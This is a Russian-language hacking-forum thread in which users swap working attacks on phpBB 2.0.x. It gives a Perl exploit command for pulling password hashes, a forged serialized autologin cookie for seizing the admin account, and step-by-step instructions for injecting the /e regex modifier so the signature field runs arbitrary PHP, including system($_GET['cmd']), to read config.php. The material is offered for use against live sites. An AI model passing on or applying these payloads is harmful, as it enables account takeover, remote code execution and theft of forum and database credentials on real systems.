ANTICHAT — форум по информационной безопасности, OSINT и технологиям

в phpbb можно исполнять команды, алгоритм хеширования: md5()
хрен ли вам не хватает получить админа?

Каким образом мне хещ достать?

Вот попробуй этот сплойт... он хеш доставает...
_ http://www.securitylab.ru/_Exploits/..._2_0_13.pl.txt
Запускать вот так....
C:\perl\bin\Perl.exe C:\perl\bin\phpbb.pl www.someserver.ru phpbb 2
Вот как раз из 2.0.12 хэш им доставали...

Кстати, так ты админку типо вот так захватил?
Вместо своих кукисов подставил вот это?:
Exploit:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Если, да то я вообще не понимаю...там сразу давается нормальная рабочая админка...

Я пробывал этот эксплойт. Пишет Exploit_Failed. Я до тучи эксплотиов пробывал все не помогают....

Войдя под админом, при помощи заменой cookies идем в профиль.
Пришли? Дальше открываем исходный текст страницы и находим:
<form action="profile.php" method="post">
дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
ИТого должно получится
<form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">

Обновляем страницу.......

И в подписе прописываем
[b:file_get_contents($_GET[bb])
В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).

Тыкаем СОхранить или ОТправить.
Идем по ссылке
http://www.someserver.ru/forum/profi...&bb=config.php

Смотри в подпись и БИНГО..... Содержимое config.php .
ДАльше делаем что хотим. (с) журнал ХАКЕР

Спасибо особенное Dr.Check'у.